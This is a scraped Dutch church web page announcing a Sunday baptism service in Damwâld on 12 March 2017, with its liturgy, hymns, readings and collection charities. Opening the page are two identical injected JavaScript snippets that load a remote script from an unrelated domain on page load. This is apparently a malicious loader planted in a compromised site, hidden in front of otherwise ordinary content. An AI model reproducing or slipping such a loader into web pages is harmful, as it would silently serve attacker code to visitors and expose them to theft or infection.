;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 12 maart 2017 9:30 uur - PKN Damwâld
zondag 12 maart 2017
09:30 uur
Doopdienst Jens en Mark Binne

Kerkdienst zondag 12 maart 2017 9:30 uur

Thema: “Volhouden”

Informatie

Voorganger:Ds. G. Timmer
Organist:Ivo van Hijum
Thema:“Volhouden”
Mededeling:Doopdienst Jens en Mark Binne
Liturgie
Lied voor de dienst Gezang 1: 1, 2, 3 en 4
Welkom en mededelingen
Intochtslied : ELB 168: 1, 2, 5, 6 en 7
Stil gebed, votum en groet
Loflied : Psalm 67: 1 en 3
Apostolische Geloofsbelijdenis
We zingen: ELB 278: 1 en 2
Lezen van het dooponderwijs uit het doopformulier
Gebed
Beantwoording van de doopvragen
Dooplied : Gezang 334: 1, 3 en 5
Bediening van de doop aan:
Jens Wielstra
Mark Binne de Groot
Toe zingen : Psalm 134: 3 (berijming 1773)
Gesprekje met de kinderen
We lezen: Filippenzen 3: 1-16
We zingen: ELB 346: 1, 2, 3 en 4 + refrein
Verkondiging : “Volhouden”
We zingen: ELB 226: 1 en 2 + refrein
Dankgebed en voorbeden
Collecte
Slotlied : ELB 501: 1, 2 en 3
Zegen
.
Na afloop van de dienst is er voor in de kerk gelegenheid om de doopouders te feliciteren en hen Gods zegen toe te wensen. Ook bent u na de dienst welkom in het Skûlplak om koffie te komen drinken.
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Stichting Regenbooggroep

De Regenbooggroep zet zich in voor de meest kwetsbare mensen in Amsterdam. Mensen die door dakloosheid, psychiatrische klachten, drank- en druggebruik, financiële nood of andere persoonlijke problemen steun nodig hebben, kunnen bij de Regenbooggroep terecht.

Tweede collecte: Kerk
Uitganscollecte: Steun gezinnen in Guatemala

Voorjaarszendingscollecte 40 Dagentijd: Steun gezinnen in Guatemala
In Guatemala is veel criminaliteit en corruptie. Conflicten worden vaak opgelost met geweld. Daarnaast is de sociale en economische ongelijkheid groot. Red Paz is een partnerorganisatie van Kerk in Actie en zet zich in voor een vreedzame samenleving in Guatemala. Dit doet zij door het geven van cursussen aan mensen die conflictsituaties binnen gezinnen, gemeenschappen en kerken op willen lossen. Het cursusaanbod bestaat uit: ‘conflict oplossen’, ‘goed burgerschap’, ‘mensenrechten’ en ‘spiritualiteit’. Bij alle cursussen is de Bijbel een belangrijke inspiratiebron. Na het volgen van een cursus zijn de cursisten in staat om conflicten in de samenleving en de oorzaken daarvan te herkennen en hier passend op te reageren. Voor 94 euro volgt één cursist een training conflict oplossen.
Uw gift maakt het mogelijk dat mensen zich in kunnen inzetten voor een vreedzame situatie in hun land. Doet u ook mee?